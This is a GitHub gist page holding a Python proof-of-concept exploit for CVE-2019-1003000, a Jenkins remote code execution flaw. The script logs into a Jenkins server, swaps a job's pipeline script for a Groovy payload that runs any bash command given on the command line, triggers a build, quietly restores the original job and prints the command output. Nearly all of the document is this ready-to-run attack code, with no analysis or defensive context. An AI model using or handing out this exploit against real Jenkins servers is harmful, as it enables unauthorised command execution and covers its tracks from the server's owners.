Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save xax007/535c319cb708bc02cd96d74ce2d6fde2 to your computer and use it in GitHub Desktop.
Save xax007/535c319cb708bc02cd96d74ce2d6fde2 to your computer and use it in GitHub Desktop.
CVE-2019-1003000-Jenkins-RCE-POC
import argparse
import jenkins
import time
from xml.etree import ElementTree
payload = '''
import org.buildobjects.process.ProcBuilder
@Grab('org.buildobjects:jproc:2.2.3')
class Dummy{ }
print new ProcBuilder("/bin/bash").withArgs("-c","%s").run().getOutputString()
'''
def run_command(url, cmd, job_name, username, password):
print '[+] connecting to jenkins...'
server = jenkins.Jenkins(url, username, password)
print '[+] crafting payload...'
ori_job_config = server.get_job_config(job_name)
et = ElementTree.fromstring(ori_job_config)
et.find('definition/script').text = payload % cmd
job_config = ElementTree.tostring(et, encoding='utf8', method='xml')
print '[+] modifying job with payload...'
server.reconfig_job(job_name, job_config)
time.sleep(3)
print '[+] putting job build to queue...'
queue_number = server.build_job(job_name)
time.sleep(3)
print '[+] waiting for job to build...'
queue_item_info = {}
while 'executable' not in queue_item_info:
queue_item_info = server.get_queue_item(queue_number)
time.sleep(1)
print '[+] restoring job...'
server.reconfig_job(job_name, ori_job_config)
print '[+] fetching output...'
last_build_number = server.get_job_info(job_name)['lastBuild']['number']
console_output = server.get_build_console_output(job_name, last_build_number)
print '[+] OUTPUT:'
print console_output
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Jenkins RCE')
parser.add_argument('--url', help='target jenkins url')
parser.add_argument('--cmd', help='system command to be run')
parser.add_argument('--job', help='job name')
parser.add_argument('--username', help='username')
parser.add_argument('--password', help='password')
args = parser.parse_args()
run_command(args.url, args.cmd, args.job, args.username, args.password)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment